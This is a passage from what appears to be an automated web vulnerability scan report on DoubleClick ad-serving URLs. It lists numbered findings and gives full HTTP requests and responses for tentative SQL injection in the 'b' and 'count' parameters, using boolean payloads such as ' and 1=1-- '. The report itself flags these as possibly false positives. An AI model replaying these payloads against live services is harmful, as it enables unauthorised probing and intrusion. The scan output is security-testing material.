3.299. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [cpnmodule parameter]

3.300. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [e parameter]

3.301. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [epartner parameter]

3.302. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [event parameter]

3.303. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [h parameter]

3.304. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [l parameter]

3.305. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [nd parameter]

3.306. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [o parameter]

3.307. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [oepartner parameter]

3.308. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [orh parameter]

3.309. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [p parameter]

3.310. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [pdom parameter]

3.311. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [pg parameter]

3.312. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [pid parameter]

3.313. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [pp parameter]

3.314. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [ppartner parameter]

3.315. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [pt parameter]

3.316. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [ra parameter]

3.317. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [rqid parameter]

3.318. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [sg parameter]

3.319. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [site parameter]

3.320. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [sz parameter]

3.321. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [t parameter]

3.322. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [b parameter]

3.323. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [cid parameter]

3.324. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [count parameter]

3.325. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [cpnmodule parameter]

3.326. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [e parameter]

3.327. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [epartner parameter]

3.328. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [event parameter]

3.329. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [h parameter]

3.330. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [l parameter]

3.331. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [nd parameter]

3.332. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [o parameter]

3.333. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [oepartner parameter]

3.334. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [orh parameter]

3.335. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [p parameter]

3.336. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [pdom parameter]

3.337. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [pg parameter]

3.338. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [pid parameter]

3.339. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [pp parameter]

3.340. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [ppartner parameter]

3.341. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [pt parameter]

3.342. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [ra parameter]

3.343. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [rqid parameter]

3.344. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [sg parameter]

3.345. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [site parameter]

3.346. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [sz parameter]

3.347. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [t parameter]

3.348. http://ad.doubleclick.net/adj/CBS.LASTFM.US/anonymoushome/anonymoushome/overview [source parameter]

3.349. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [b parameter]

3.350. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [b parameter]

3.351. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [cid parameter]

3.352. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [cid parameter]

3.353. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [count parameter]

3.354. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [count parameter]

3.355. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [cpnmodule parameter]

3.356. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [cpnmodule parameter]

3.357. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [e parameter]

3.358. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [e parameter]

3.359. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [epartner parameter]

3.360. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [epartner parameter]

3.361. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [event parameter]

3.362. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [event parameter]

3.363. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [h parameter]

3.364. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [h parameter]

3.365. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [l parameter]

3.366. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [l parameter]

3.367. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [nd parameter]

3.368. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [nd parameter]

3.369. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [o parameter]

3.370. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [o parameter]

3.371. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [oepartner parameter]

3.372. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [oepartner parameter]

3.373. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [orh parameter]

3.374. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [orh parameter]

3.375. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [p parameter]

3.376. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [p parameter]

3.377. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [pdom parameter]

3.378. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [pdom parameter]

3.379. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [pg parameter]

3.380. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [pg parameter]

3.381. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [pid parameter]

3.382. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [pid parameter]

3.383. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [pp parameter]

3.384. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [pp parameter]

3.385. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [ppartner parameter]

3.386. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [ppartner parameter]

3.387. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [pt parameter]

3.388. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [pt parameter]

3.389. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [ra parameter]

3.390. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [ra parameter]

3.391. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [rqid parameter]

3.392. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [rqid parameter]

3.393. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [sg parameter]

3.394. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [sg parameter]

3.395. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [site parameter]

3.396. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [site parameter]

3.397. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [sz parameter]

3.398. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [sz parameter]

3.399. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [t parameter]

3.400. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [t parameter]

3.401. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [b parameter]

3.402. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [b parameter]

3.403. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [cid parameter]

3.404. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [cid parameter]

3.405. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [count parameter]

3.406. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [count parameter]

3.407. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [cpnmodule parameter]

3.408. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [cpnmodule parameter]

3.409. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [e parameter]

3.410. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [e parameter]

3.411. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [epartner parameter]

3.412. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [epartner parameter]

3.413. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [event parameter]

3.414. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [event parameter]

3.415. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [h parameter]

3.416. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [h parameter]

3.417. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [l parameter]

3.418. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [l parameter]

3.419. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [nd parameter]

3.420. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [nd parameter]

3.421. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [o parameter]

3.422. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [o parameter]

3.423. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [oepartner parameter]

3.424. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [oepartner parameter]

3.425. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [orh parameter]

3.426. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [orh parameter]

3.427. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [p parameter]

3.428. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [p parameter]

3.429. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [pdom parameter]

3.430. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [pdom parameter]

3.431. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [pg parameter]

3.432. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [pg parameter]

3.433. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [pid parameter]

3.434. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [pid parameter]

3.435. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [pp parameter]

3.436. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [pp parameter]

3.437. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [ppartner parameter]

3.438. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [ppartner parameter]

3.439. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [pt parameter]

3.440. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [pt parameter]

3.441. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [ra parameter]

3.442. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [ra parameter]

3.443. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [rqid parameter]

3.444. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [rqid parameter]

3.445. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [sg parameter]

3.446. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [sg parameter]

3.447. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [site parameter]

3.448. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [site parameter]

3.449. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [sz parameter]

3.450. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [sz parameter]

3.451. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [t parameter]

3.452. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [t parameter]

4. Flash cross-domain policy

5. Silverlight cross-domain policy

6. Cross-domain Referer leakage

6.1. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18

6.2. http://ad.doubleclick.net/adi/N1823.bnet.com/B5040075.19

6.3. http://ad.doubleclick.net/adi/N1823.bnet.com/B5040075.20

6.4. http://ad.doubleclick.net/adi/N1823.bnet.com/B5040075.21

6.5. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102

6.6. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2

6.7. http://ad.doubleclick.net/adi/N4581.811.CBSPUBLISHER/B2336781

6.8. http://ad.doubleclick.net/adi/N4581.811.CBSPUBLISHER/B2336781

6.9. http://ad.doubleclick.net/adi/N4581.811.CBSPUBLISHER/B2336781

6.10. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4

6.11. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23

6.12. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15

6.13. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5

6.14. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6

6.15. http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20

6.16. http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8

6.17. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2

6.18. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3

6.19. http://ad.doubleclick.net/adj/CBS.LASTFM.US/anonymoushome/anonymoushome/overview

7. Cross-domain script include

7.1. http://ad.doubleclick.net/adi/N1823.bnet.com/B5040075.19

7.2. http://ad.doubleclick.net/adi/N1823.bnet.com/B5040075.20

7.3. http://ad.doubleclick.net/adi/N1823.bnet.com/B5040075.21

7.4. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102

7.5. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2

7.6. http://ad.doubleclick.net/adi/N4581.811.CBSPUBLISHER/B2336781

7.7. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4

7.8. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15

7.9. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5

7.10. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6

7.11. http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8

7.12. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2

7.13. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3

8. Robots.txt file

9. HTML does not specify charset

9.1. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18

9.2. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102

9.3. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2

9.4. http://ad.doubleclick.net/adi/N4581.811.CBSPUBLISHER/B2336781

9.5. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4

9.6. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23

9.7. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15

9.8. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5

9.9. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6

9.10. http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20

9.11. http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8

9.12. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2

9.13. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3



1. SQL injection  next
There are 7 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://ad.doubleclick.net/adi/N4581.811.CBSPUBLISHER/B2336781 [b parameter]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adi/N4581.811.CBSPUBLISHER/B2336781

Issue detail

The b parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the b parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adi/N4581.811.CBSPUBLISHER/B2336781;sz=300x250;click0=http://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21%20and%201%3d1--%20&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/;ord=2011.04.27.21.56.00? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacritic.com/games/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:03:33 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5552

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page Multiples - [DFA] -->
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/1435575/1-Promotions_0211-1231_Branding-14MillionGeek_300x250.swf";
var gif = "http://s0.2mdn.net/1435575/1-Promotions_0211-1231_Branding-14MillionGeek_300x250.jpg";
var minV = 6;
var FWH = ' width="300" height="250" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/11e/%2a/c%3B237718223%3B0-0%3B0%3B61055221%3B4307-300/250%3B40719066/40736853/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21%20and%201%3d1--%20&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/http://www.newegg.com?nm_mc=ExtBanner&cm_mmc=BAC-CBSBrand-_-14MillionGeeks-_-NA-_-NA");
var wmode = "opaque";
var bg = "same as SWF";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 600;
var winH = 400;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();
sm[1] = "";
sm[2] = "";
sm[3] = "";
sm[4] = "";
sm[5] = "";

var ct=new Array();
ct[0]="";if(ct[0].substr(0,4)!="http"){ct[0]="";}
ct[1] = "";
ct[2] = "";
ct[3] = "";
ct[4] = "";
ct[5] = "";
ct[6] = "";
ct[7] = "";
ct[8] = "";
ct[9] = "";
ct[10] = "";

var fv='"clickTag='+url+'&clickTAG='+url+'&clicktag='+url+'&moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/';
for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}}
for(i=1;i<ct.length;i++){if(ct[i]!=""){if(ct[i].indexOf("http")==0){x=escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/11e/%2a/c%3B237718223%3B0-0%3B0%3B61055221%3B4307-300/250%3B40719066/40736853/1%3B%3B%7Esscs%3D%3
...[SNIP]...

Request 2

GET /adi/N4581.811.CBSPUBLISHER/B2336781;sz=300x250;click0=http://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21%20and%201%3d2--%20&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/;ord=2011.04.27.21.56.00? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacritic.com/games/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:03:34 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 840

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3af6/14/11e/%2a/a;239957955;0-0;0;61055221;4307-300/250;41448515/41466302/1;;~sscs=%3fhttp://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21%20and%201%3d2--%20&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/http://promotions.newegg.com/Gazelle/11-0737/index.html?nm_mc=ExtBanner&cm_mmc=BAC-CBSBrand-_-1Ton-_-0401-_-0430"><img src="http://s0.2mdn.net/viewad/1435575/Promotions_0401-0430_Branding-1Ton_300x250.jpg" border=0 alt="Click here to find out more!"></a></body></html>

1.2. http://ad.doubleclick.net/adi/N4581.811.CBSPUBLISHER/B2336781 [count parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adi/N4581.811.CBSPUBLISHER/B2336781

Issue detail

The count parameter appears to be vulnerable to SQL injection attacks. The payloads 14607837'%20or%201%3d1--%20 and 14607837'%20or%201%3d2--%20 were each submitted in the count parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adi/N4581.811.CBSPUBLISHER/B2336781;sz=300x250;click0=http://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=14607837'%20or%201%3d1--%20&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/;ord=2011.04.27.21.56.00? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacritic.com/games/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:08:56 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 852

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3af6/14/126/%2a/v;240427355;0-0;0;61055221;4307-300/250;41883579/41901366/1;;~sscs=%3fhttp://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=14607837'%20or%201%3d1--%20&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/http://promotions.newegg.com/nepro/11-1111/index.html?nm_mc=ExtBanner&cm_mmc=BAC-CBSBrand-_-10off50-_-0426-_-0427"><img src="http://s0.2mdn.net/viewad/1435575/Promotions_0426-0427_Branding-10off50_300x250.jpg" border=0 alt="Click here to find out more!"></a></body></html>

Request 2

GET /adi/N4581.811.CBSPUBLISHER/B2336781;sz=300x250;click0=http://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=14607837'%20or%201%3d2--%20&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/;ord=2011.04.27.21.56.00? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacritic.com/games/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
